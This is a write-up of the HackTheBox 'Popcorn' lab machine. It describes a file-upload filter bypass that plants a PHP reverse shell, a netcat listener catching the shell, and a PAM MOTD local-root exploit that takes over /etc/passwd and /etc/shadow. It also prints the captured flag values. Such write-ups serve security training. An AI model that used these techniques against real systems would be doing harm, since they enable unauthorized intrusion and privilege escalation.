HackTheBox Popcorn Writeup

NMAP:

root@37f72653a832:/# nmap -sC -sV -T4 -p- 10.10.10.6
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-14 23:52 UTC
Nmap scan report for 10.10.10.6
Host is up (0.019s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))
|_http-server-header: Apache/2.2.12 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.63 seconds

GOBUSTER:

/index (Status: 200)
/index.html (Status: 200)
/test (Status: 200)
/test.php (Status: 200)
/torrent (Status: 301)
/rename (Status: 301)

Navigating to /torrent reveals a torrent hoster. Here I can create an account. Once logged in I can upload a torrent file.

Now once the torrent file is uploaded I can click on Edit this torrent to upload a screenshot. This is where I will upload a reverse php shell and will intercept the request using Burpsuite to bypass the upload filter.

I change the Content type of the request from application/octet-stream to image/jpeg and then forward the request. I get a success message that file was uploaded

Now going back to the torrent uploader the screenshot section now displays a messsage like Image File Not Found!. Clicking on the message triggers the shell and opens up the reverse connection. I get a shell as www-data

root@37f72653a832:/# nc -lvnp 9999
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 10.10.10.6.
Ncat: Connection from 10.10.10.6:53362.
whoami
www-data

From here I can read the user.txt flag

www-data@popcorn:/home/george$ cat user.txt
5e36a929398ecc5d5c110f2d865cf136

After doing some enumeration around the box I find that it is running an outdated version of PAM. I confirm this using the command below

www-data@popcorn:/home/george/.cache$ dpkg -l | grep pam
dpkg -l | grep pam
ii  libpam-modules                      1.1.0-2ubuntu1                    Pluggable Authentication Modules for PAM
ii  libpam-runtime                      1.1.0-2ubuntu1                    Runtime support for the PAM library
ii  libpam0g                            1.1.0-2ubuntu1                    Pluggable Authentication Modules library
ii  python-pam                          0.4.2-12ubuntu3                   A Python interface to the PAM library

Checking Exploit Database there is this exploit that can be used to escalate privileges.

www-data@popcorn:/dev/shm$ bash 14339.sh
bash 14339.sh
[*] Ubuntu PAM MOTD local root
[*] SSH key set up
[*] spawn ssh
[+] owned: /etc/passwd
[*] spawn ssh
[+] owned: /etc/shadow
[*] SSH key removed
[+] Success! Use password toor to get root
Password: toor

root@popcorn:/dev/shm#

From here I can read the root.txt file

root@popcorn:~# cat root.txt
cat root.txt
f122331023a9393319a0370129fd9b14

HackTheBox Popcorn (10.10.10.6) Writeup

Ghost

Ghost

HackTheBox Resolute (10.10.10.169) Writeup

HackTheBox Blunder (10.10.10.191) Writeup

HackTheBox Cache (10.10.10.188) Writeup

HackTheBox Beep (10.10.10.7) Writeup

HackTheBox Legacy (10.10.10.4) Writeup